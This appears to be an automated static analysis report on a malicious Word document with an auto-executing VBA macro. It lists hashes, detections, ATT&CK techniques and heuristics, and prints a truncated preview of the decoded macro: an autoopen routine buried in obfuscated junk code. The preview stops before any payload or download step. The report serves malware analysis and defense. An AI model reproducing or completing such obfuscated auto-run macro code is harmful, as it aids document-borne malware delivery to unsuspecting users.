Malicious Office (OLE) — malware analysis report

Static analysis result for SHA-256 4dcdf99c5887c75f…

MALICIOUS

Office (OLE)

Size: 166.4 KB
Created: 2019-04-25 09:26:00
Authoring application: Microsoft Office Word
First seen: 2020-02-04
MD5: 7a7ffb5f4170fc8bd9a05b1dbce6884b
SHA-1: 9e07f5fa269846779557e94dced9ce169aca664f
SHA-256: 4dcdf99c5887c75f537f1e0fb424246417848c992eafb905c73c8c93ac4aa5d1
Risk Score: 222

Malware Insights

MITRE ATT&CK
  • T1059.005 Visual Basic
  • T1566.001 Spearphishing Attachment
  • T1203 Exploitation for Client Execution

The file is identified as malicious by ClamAV and contains a high-severity OLE_VBA_AUTOOPEN heuristic, indicating the presence of an auto-executing VBA macro. The macro is designed to execute code using GetObject, likely to download and run a second-stage payload. No specific family could be identified, but the technique suggests a macro-based downloader.

Heuristics (7)

  • ClamAV: Doc.Malware.Dvwf-6956245-0 [critical] CLAMAV_DETECTION
    ClamAV detected this file as malware: Doc.Malware.Dvwf-6956245-0
  • VBA macros detected [medium, 3 related findings] OLE_VBA_MACROS
    Document contains VBA macro code
  • AutoOpen macro [high] OLE_VBA_AUTOOPEN
    AutoOpen macro
  • GetObject call [high] OLE_VBA_GETOBJ
    GetObject call
  • VBA p-code auto-exec with execution tokens [high] OLE_VBA_PCODE_AUTOEXEC_EXEC
    Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
  • Legacy WordBasic auto-exec macro marker [medium] OLE_LEGACY_WORDBASIC_AUTOEXEC
    OLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
  • Embedded URL [info] EMBEDDED_URL
    One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
    URL: http://schemas.openxmlformats.org/drawingml/2006/main (channel: document text, OLE body)

Extracted artifacts (1)

Files carved from inside the sample during analysis.

Filename | Kind | Source | Size
macros.bas | vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 25546 bytes
SHA-256: 63552ef952b653ad980325adb7767d567b0b555ec0f33d991ecea5e213c95f33
Preview of the extracted script (first 1,000 lines):
Attribute VB_Name = "OAAAZC"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True

Attribute VB_Name = "wQDCAcC"
Attribute VB_Base = "0{EC36BAE5-7ADE-4F95-B004-CE1957793634}{5B1E76E0-9352-4FC3-AED8-71E38191B46E}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False

Attribute VB_Name = "I4XAUBBZ"
Attribute VB_Base = "0{C824A8E8-B0A3-406D-9B48-F91A9EA68976}{0778C759-CC9F-4601-AD3A-CD781E9CA4CB}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False

Attribute VB_Name = "dBACAAA1"
Sub autoopen()
   If v_AQQCBc = kZABkQA Then
ElseIf u_UAUCA = mxBDXA Then
            s4ACxUA = Atn(454565679)
ElseIf YCkkooQ = LUxBQ41 Then
            uA1UA_GQ = Int(999281804)
ElseIf oA4Q1QAX = j1GQAA Then
End If
   If LQX4BAA = iAABBABQ Then
ElseIf m_4AUBAA = hUAAZB Then
            b_QUAX = Atn(430765672)
ElseIf jwDAAD = t4xAxAQo Then
            KcUDcU = Int(727024415)
ElseIf MxGA1D_A = qXxDc4 Then
End If
   If UQcoCA = ZXAUGD Then
ElseIf KAZUBAB = ZAUUAk Then
            ZA1AQB_ = Atn(632069907)
ElseIf IACDXDA = FZGDAAQA Then
            jAA_AXx = Int(911954614)
ElseIf QxDAoG4A = AAAw_c Then
End If
c4DDUC
   If wABAQQ = iDQkAw Then
ElseIf VQD1UU_ = tZUXBDBA Then
            nAXkDD1A = Atn(39628240)
ElseIf hAAAcxXZ = j_QAAB Then
            mCBA1G = Int(53483851)
ElseIf zCA1AXA = XC4AAA Then
End If
   If lABXZQ = AAAABA Then
ElseIf MUBkQD = YGQBDBG Then
            LoAAAUkA = Atn(70914249)
ElseIf ADACAA = sAD4UXA Then
            bAAwAc = Int(631660017)
ElseIf ToG_QU = SDQBQAcA Then
End If
End Sub
Function XXxX4Dw(mQoADc)
   If MAA4A4G = zDCcQA Then
ElseIf VoA1ABB = MDQBAA Then
            aACDxXG = Atn(903441126)
ElseIf rA11AAoB = PcDUAXD Then
            TBB4_AA = Int(374880229)
ElseIf lDUDAxx = j4c1ZQwQ Then
End If
   If UUAAU_ = f1QUAo Then
ElseIf t4oAcZ = twGAAADB Then
            IZw4oAUA = Atn(324071606)
ElseIf SAc11AA = BAAAQXAA Then
            LGcAUAAA = Int(711569659)
ElseIf rXoAQcU4 = CUABA4A Then
End If
Set XXxX4Dw = CVar(mQoADc)
   If YAQG_w = wAADcA Then
ElseIf pXQAo_G = uAGA4AAZ Then
            pAAAACo = Atn(806537656)
ElseIf U1UA_B = BXxGDG Then
            rwDAXBBQ = Int(875458927)
ElseIf H1DcAD = ixQ4QBU Then
End If
   If pkBoxZGA = QAA4D1kQ Then
ElseIf VBXAAcoU = ickQDAA Then
            HXX1Dk = Atn(396828347)
ElseIf CAowAAU = WkxA1UAA Then
            jQXAQQ = Int(397614101)
ElseIf cBADDD = mDX1AkAU Then
End If
End Function

Attribute VB_Name = "v_oDAA1"
Function c4DDUC()
On Error Resume Next
   If TADxxoB = wGU1Qo Then
ElseIf XUZBA1A = AQA1Q1Z Then
            WAcQQ_Bc = Atn(902672992)
ElseIf uA4_c4 = BAAA_ABx Then
            WUoc4_GA = Int(685590749)
ElseIf lDUQ1_ = k1AAG1BU Then
End If
   If cDAUAABA = IAcUAZG Then
ElseIf TA4ADQ = zCQQADw Then
            dxAXkoDZ = Atn(512946224)
ElseIf OZAoAA = wQDXQBAX Then
            SwAXAAGC = Int(918804106)
ElseIf NABGA1_A = EA111wB Then
End If
If 5072 < 19851 Then
tA_QAB4w = vbFalse
   If qGAAwowB = iCGAQBZ Then
ElseIf b1XAwU = n_GAAAc Then
            NooAGwcC = Atn(996313995)
ElseIf UBxUAwB = MUXBA_D Then
            oAUUx1A = Int(645588906)
ElseIf EX_wGQAX = fBAQQZBG Then
End If
   If jUAAGUoc = v44GACQ Then
ElseIf J1GDXACQ = LAAwAAA Then
            Y4AA_AA = Atn(887414397)
ElseIf UCCAQA = fQcAAk Then
            iDDXAcBo = Int(141127305)
ElseIf AXXAXGD = OZxZQwQB Then
End If
   If wAAADDQ = Aw4wQDA Then
ElseIf PAAZADU = tBGDwB4 Then
            nAAUDAA = Atn(51129147)
ElseIf FCxAw4A = YxABDUAA Then
            BQABBZUA = Int(578241693)
ElseIf txAA4ABA = IwA_QcU 
... (truncated)